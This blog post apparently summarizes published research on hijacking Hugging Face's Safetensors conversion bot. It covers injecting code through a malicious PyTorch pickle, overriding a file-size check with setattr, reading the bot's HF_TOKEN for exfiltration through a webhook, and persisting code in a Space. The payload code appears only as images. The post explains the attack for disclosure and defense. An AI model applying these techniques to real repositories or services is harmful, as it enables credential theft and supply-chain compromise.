1
0
Ai & Security

Hugging Face models , a risk ?

Rohit Yadav
Ai & Security
Hugging Face
SecurityGenerative AI

| Hidden Layer | Hijacking Safetensors Conversion on Hugging Face HiddenLayer

Where did it start ?

Security researchers have discovered that Hugging Face, a popular online repository for AI models, has been hosting thousands of malicious files designed to steal data and compromise systems. These "malicious models" often contain hidden code that can target cloud infrastructure, steal credentials, or poison data. Hackers have even created fake profiles posing as legitimate companies to trick users into downloading the compromised models. One such model, impersonating 23andMe, was downloaded thousands of times before it was detected, with malicious code aimed at stealing AWS passwords. In response, Hugging Face has partnered with ProtectAI to integrate a scanning tool that alerts users to harmful code before downloads. This issue has gained enough attention to prompt security agencies in the U.S., Canada, and the U.K. to issue a joint warning about the risks of using unverified AI models, particularly for businesses. Hugging Face, valued at $4.5 billion, has acknowledged the growing security risks as its popularity increases within the AI research community .

Understanding The Exploits

Bypassing the Hugging Face Safetensors conversion space and its associated service bot

What did they do to prevent unsafe serialization deserialization of Models ?

To help pivot the Hugging Face userbase to this safer alternative, the company created a conversion service to convert any PyTorch model contained within a repository into a Safetensors alternative via a pull request. The code (convert.py) for the conversion service is sourced directly from the ==Safetensors== projects and runs via Hugging Face Spaces, a cloud compute offering for running Python code in the browser.

The Conversion Steps

Overview:

A Gradio application is bundled with convert.py to provide a web interface for converting PyTorch models to SafeTensors format. The interface allows the user to specify a repository for conversion. Only PyTorch models (specifically those with the filename pytorch_model.bin) are supported for conversion. Steps for Conversion: The repository ID must be provided in the format:
Username/repository-name

Example: A user provides a repository containing a valid PyTorch model. Repository Requirements: The repository must contain a PyTorch model in the format pytorch_model.bin The repository must be parseable by the conversion service for successful processing. User Interface: The web interface allows users to enter the repository ID and trigger the conversion process. For example, users can enter a repository they created or another one containing a model they want to convert. Example UI Flow: - Step 1: User navigates to the conversion application’s web UI. - Step 2: User enters the repository ID in the required format and submits.

Conversion Process:

  • Upon a valid submission, the conversion service will:
    • Convert the PyTorch model into SafeTensors format.
    • Create a pull request to the originating repository automatically.
    • The pull request will be made using the SFconvertbot user account, which acts as the conversion bot.

No User Token Required:

  • Users do not need a user token from the repository owner to initiate the conversion.
  • This means anyone can submit a conversion request to any public repository, even if they don’t own it.

Pull Request Example:

  • After successful conversion, the SFconvertbot will issue a pull request to the target repository. This PR contains the converted model in SafeTensors format.
  • Figure 3 shows the PR created by the SafeTensors conversion bot SFconvertbot.

Testing Example:

  • For testing, a repository with a specially crafted PyTorch model was used, following the above process.
Identifying the attack vector

Safetensors conversion bot loads PyTorch files, specifically using the function _torch.load(), which could potentially compromise the host machine. The script convert.py includes a safety warning that can be bypassed manually with the -y flag when running the script directly from the command line (as opposed to using the bundled Gradio application in app.py). This raises security concerns regarding the bot's handling of potentially unsafe files.

image

Figure 4 – convert.py safety warning.

Lo and behold, the tensors are being loaded using the torch.load() function, which can lead to arbitrary code execution if malicious code is stored within data.pkl in the PyTorch model. But what is different with the conversion bot in Hugging Face spaces? As it turns out, nothing – they’re the same thing!

image

Figure 5 – torch.load() used in the convert.py conversion script.

At this point, it dawned on us. Could someone hijack the hosted conversion service using the very thing that it was designed to convert?

Crafting the exploit

We set to work putting our thoughts into practice by crafting a malicious PyTorch binary using the pre-trained AlexNet model from torchvision and injected our first payload ==– eval(“print(‘hi’)”) –== a simple eval call that would print out ‘hi’.

Rather than testing on the live service, we deployed a local version of the converter service to evaluate our code execution capabilities and see if a pull request would be created.

We were able to confirm that our model had been loaded as we could see ‘hi’ in the output but with one peculiar error. It seemed that by adding in our exploit code, we had modified the file size of the model past a point of 1% difference, which had ultimately prevented the model from being converted or the bot from creating a pull request:

image

Figure 6 – Terminal output from a local run of convert.py.

Faced with this error, we considered two possible approaches to circumvent the problem. Either use a much larger file or use our exploit to bypass the size check. As we wanted our exploit to work on any type of PyTorch model, we decided to proceed with the latter and investigate the logic for the file size check.

image

Figure 7 – The check_file_size function.

The function check_file_size took two string arguments representing the filenames, then used os.stat to check their respective file size, and if they differed too greatly (>1%), it would throw an error.

At first, we wanted to find a viable method to modify the file sizes to skip the conditional logic. However, when the PyTorch model was being loaded, the Safetensors file did not yet exist, causing the error. As our malicious model had loaded before this file size check, we knew we could use it to make changes to the convert.py script at runtime and decided to overwrite the function pointer so that a different function would get called instead of check_file_size.

As check_file_size did not return anything, we just needed a function that took in two strings and didn’t throw an exception. Our potential replacement function os.path.join fit this criteria perfectly. However, when we attempted to overwrite the check_file_size function, we discovered a problem. PyTorch does not permit the equals symbol ‘=’ inside any strings, preventing us from assigning a value to a function pointer in that manner. To counter this, we created the following payload, using setattr to overwrite the function pointer manually:

image

Figure 8 – Python code to overwrite the check_file_size function pointer.

After modifying our PyTorch model with the above payload, we were then able to convert our model successfully using our local converter. Additionally, when we ran the model through Hugging Face’s converter, we were able to successfully create a pull request, now with the ability to compromise the system that the conversion bot was hosted on:

iamge

Figure 9 – Successfully converting a malicious PyTorch model and issuing a pull request using the Hugging Face service.

Imitation is the greatest form of flattery

While the ability to arbitrarily execute code is powerful even when operating in a sandbox, we noticed the potential for a far greater threat. All pull requests from the conversion service are generated via the SFconvertbot, an official bot belonging to Hugging Face specifically for this purpose. If an unwitting user sees a pull request from the bot stating that they have a security update for their models, they will likely accept the changes. This could allow us to upload different models in place of the one they wish to be converted, implant neural backdoors, degrade performance, or change the model entirely – posing a huge supply chain risk.

Since we knew that the bot was creating pull requests from within the same sandbox that the convert code runs in, we also knew that the credentials for the bot would more than likely be inside the sandbox, too.

Looking through the code, we saw that they were set as environmental variables and could be accessed using os.environ.get(“HF_TOKEN”). While we now had access to the token, we still needed a method to exfiltrate it. Since the container had to download the files and create the pull requests, we knew it would have some form of network access, so we put it to the test. To ascertain if we could hit a domain outside the Hugging Face domain space, we created a remote webhook and sent a get request to the hook via the malicious model:

image

Figure 10 – Receiving a web request from the system running the Hugging Face conversion service.

Success! We now have a way to exfiltrate the Hugging Face SFConvertbot token, send a malicious pull request to any repository on the site impersonating a legitimate, official service.

Though we weren’t done quite yet.

You can’t beat the real thing

Unhappy with just impersonating the bot, we decided to check if the service restarted each time a user tried to convert a model, so as to evaluate an opportunity for persistence. To achieve this, we created our own Hugging Face Space built on the Gradio SDK, to make our Space as close to the conversion service as possible.

image

Figure 11 – Selecting the Gradio SDK option when creating our own Space for testing_

Now that we had the space set up, we needed a way to imitate the conversion process. We created a Gradio application that took in user input, executed it using the inbuilt Python function ‘exec’. Then, we included with it a dummy function ‘greet_world’ which, regardless of user input, would output ‘Hello world!’.

In effect, this incredibly strenuous work allowed us to closely simulate the environment of the conversion function by allowing us to execute code similarly to the torch.load() call, and gave us a target function to attempt to overwrite at runtime. Our real target being the save_file function in convert.py which saves the converted SafeTensors file to disk.

image

Figure 12 – Our testing code from Hugging Face Spaces_

Once we had everything up and running, we issued a simple test to see if the application would return “Hello World” after being given some code to execute:

image

Figure 13 – The testing Gradio application in our own Space_

In a similar vein to how we approached bypassing the get_file_size function, we attempted to overwrite greet_world using setattr. In our exploit script, we limited ourselves to what we would be allowed to use in the context of the torch.load. We decided to go with the approach of creating a local file, writing the code we wanted into it, retrieving a pointer to greet_world, and replacing it with our own malicious function.

image

Figure 14 – Successfully overwriting the greet_world function_

As seen in Figure 14, the response changed from “Hello World!” to “pwned”, which was our success case. Now the real test began. We had to see if the changes made to the Space would persist once we had refreshed it in the browser. By doing so, we could see if the instance would restart and, by virtue, if our changes would persist. Once again, we input our initial benign prompt, except this time “pwned” was the result on our newly refreshed page.

We had persistence.

image

Figure 15 – Testing our initial benign prompt against the compromised Space_

We had now proved that an attacker could run any arbitrary code any time someone attempted to convert their model. Without any indication to the user themselves, their models could be hijacked upon conversion. What’s more, if a user wished to convert their own private repository, we could in effect steal their Hugging Face token, compromise their repository, and view all private repositories, datasets, and models which that user has access to.

Now how is it affecting every one ?

The Hugging Face platform hosts over 500,000 machine-learning models that are vulnerable to malicious code injection, especially through insecure file formats. To address this, Hugging Face introduced the Safetensors conversion bot, which converts models into a safer format free from malware. However, this service can be hijacked, posing a potential supply chain risk for major organizations, as any user can submit a pull request for a public repository, not just the original model creator. This raises concerns about the security of changes made to models, as organizations like Microsoft and Google have accepted pull requests from the bot without fully verifying the changes. Attackers could exploit this process to introduce backdoors into models, which could trigger malicious behavior, such as bypassing security systems or spreading disinformation. Since machine learning models are stored in non-human-readable formats, detecting such tampering requires programmatic comparisons, making it difficult to notice unauthorized changes. The article advises users to thoroughly investigate repositories for potential tampering and secure their model weights and biases against such risks.

Share this article:
Back to Blog